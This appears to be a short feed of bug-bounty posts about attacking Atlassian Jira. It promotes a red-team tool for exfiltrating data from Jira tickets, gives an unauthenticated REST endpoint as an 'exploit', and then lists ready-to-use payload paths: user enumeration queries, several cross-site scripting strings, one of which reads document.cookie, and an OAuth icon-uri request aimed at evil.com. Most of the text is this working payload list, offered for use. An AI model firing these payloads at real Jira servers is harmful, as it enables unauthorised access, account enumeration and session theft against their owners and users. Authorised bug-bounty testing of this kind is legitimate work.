Jir-thief
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
A Red Team tool for exfiltrating sensitive data from Jira tickets.
https://github.com/antman1p/Jir-Thief
#jira #redteam
GitHub
GitHub - antman1p/Jir-Thief: A Red Team tool for exfiltrating sensitive data from Jira tickets.
A Red Team tool for exfiltrating sensitive data from Jira tickets. - antman1p/Jir-Thief
Jira Unauthenticated Access to Screens
Exploit:
Depends on the Program, some accept it and some consider this Informational.
#jira #bugbounty
Exploit:
jira.example.com/rest/api/2/screensNote:
Depends on the Program, some accept it and some consider this Informational.
#jira #bugbounty
Atlassian Jira Payloads
/secure/QueryComponent!Default.jspa
/secure/ViewUserHover.jspa
/ViewUserHover.jspa?username=Admin
/rest/api/2/dashboard?maxResults=100
/pages/%3CIFRAME%20SRC%3D%22javascript%3Aalert(‘XSS’)%22%3E.vm
/rest/api/2/user/picker?query=admin
/plugins/servlet/oauth/users/icon-uri?consumerUri=https://evil.com
/secure/ConfigurePortalPages!default.jspa?view=search&searchOwnerUserName=x2rnu%3Cscript%3Ealert(1)%3C%2fscript%3Et1nmk&Search=SearchConfigurePortalPages.jspa
/plugins/servlet/Wallboard/?dashboardId=10100&dashboardId=10101&cyclePeriod=(function(){alert(document.cookie);return%2030000;})()&transitionFx=none&random=true
/secure/ConfigurePortalPages!default.jspa?view=popular
/secure/ManageFilters.jspa?filterView=search&Search=Search&filterView=search&sortColumn=favcount&sortAscending=false
/secure/ContactAdministrators!default.jspa
#bugbounty #jira #payloads